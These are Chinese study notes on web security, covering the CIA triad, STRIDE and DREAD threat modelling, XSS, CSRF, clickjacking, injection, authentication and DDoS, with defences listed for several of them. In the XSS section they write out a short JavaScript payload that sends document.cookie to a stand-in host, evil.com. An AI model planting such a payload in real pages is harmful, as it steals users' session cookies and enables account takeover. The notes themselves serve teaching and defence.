机密性Confidentiality 保护数据不能泄露
完整性Integrity 保护数据内容是完整的,没有被篡改的
可用性Avaliability 保证资源‘随需可得’
评估过程 资产等级划分-》威胁分析-》风险分析-》确认解决方案
把可能照成危害的来源称为威胁,威胁分析就是把所有威胁找出来,比较全面的方法就是使用威胁建模
STRIDE模型
风险=可能性*损失大小
科学衡量风险 DREAD模型
同源策略
沙箱
恶意地址拦截
通常指黑客通过HTML注入篡改网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器
类型1 反射性XSS 非持久性XSS
只是简单把用户输入数据反射给浏览器
类型2 存储型XSS
把用户输入的数据存储在服务器端,比如把带有恶意脚本的博客保存在服务器给用户浏览
类型3 DOM Based XSS
通过修改页面DOM节点形成的XSS
XSS Payload
XSS攻击成功后,攻击者对用户浏览的页面植入的恶意脚本被称作XSS Payload
攻击者先通过链接加载一个远程脚本 http://www.a.com/test.html?abc=">
在脚本中可以窃取Cookie
var img = document.createElement("img");
img.src="http://evil.com/log?"+escape(document.cookie);
document.body.appendChild(img);
在服务器中就会收到这个请求
XSS Payload还可以构造GET POST请求
一个XSS Demo,提供了多道XSS的攻击题目,
访问地址:https://xss.haozi.me
XSS防御
1.httpONLY
禁止页面的JavaScript访问带有HttpOnly属性的Cookie
2.输入检查
格式检查 特殊字符检查
3.输出检查
安全的编码函数
4.数据与代码分离
5.正确处理富文本
跨站点请求伪造CSRF
浏览器的Cookie策略
Session Cookie 临时Cookie
本地Cookie
P3P
Get Post也可以进行CSRF攻击
构造Post请求方式 在页面中构造出一个form表单,然后使用JavaScript自动提交表单
Flash CSRF
CSRF Worm
CSRF防御
1.验证码
2.Referer Check
3.Anti CSRF Token
点击劫持 ClickJacking
防御:frame busing
X-Frame-Option
HTML5安全
服务器安全
注入攻击
1.盲注
2.Timing Attack
XML注入
代码注入
CRLF注入
文件上传漏洞
认证与会话管理
密码
多因素认证
Session与认证 SessionFixation攻击 Session保持攻击
单点登录SSO
访问控制
垂直权限管理
水平权限管理
OAuth
DDOS
应用层DDOS